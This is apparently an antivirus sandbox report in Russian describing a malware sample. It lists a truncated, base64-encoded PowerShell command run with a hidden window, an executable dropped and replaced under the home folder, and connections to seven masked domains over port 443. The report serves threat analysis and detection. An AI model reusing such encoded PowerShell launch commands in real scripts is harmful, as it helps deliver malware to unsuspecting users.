Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAEUAdAAtAEkAdABlAE0AIAAgACgAJwB2AEEAUgAnACsAJwBpACcAKwAnAEEAQgBMAEUAOgAnACsAJwAxACcAKwAnADkAUwBSAFUAJwApACAAIAAoAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\sgiwuw4\v1z2_oq\rzv0xu.exe
Удаляет следующие файлы
- %HOMEPATH%\sgiwuw4\v1z2_oq\rzv0xu.exe
Подменяет следующие файлы
- %HOMEPATH%\sgiwuw4\v1z2_oq\rzv0xu.exe
Сетевая активность
TCP
- 'pr###urd.com':443
- 'tw##tan.com':443
- 'be###oba.com':443
- 'ja####ubarak.com':443
- 'xx###rn.futbol':443
- 'vi######igitalmarketing.org':443
- 'ha##e.net':443
UDP
- DNS ASK pr###urd.com
- DNS ASK tw##tan.com
- DNS ASK be###oba.com
- DNS ASK ja####ubarak.com
- DNS ASK xx###rn.futbol
- DNS ASK vi######igitalmarketing.org
- DNS ASK ha##e.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABzAEUAdAAtAEkAdABlAE0AIAAgACgAJwB2AEEAUgAnACsAJwBpACcAKwAnAEEAQgBMAEUAOgAnACsAJwAxACcAKwAnADkAUwBSAFUAJwApACAAIAAoAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQ...' (со скрытым окном)
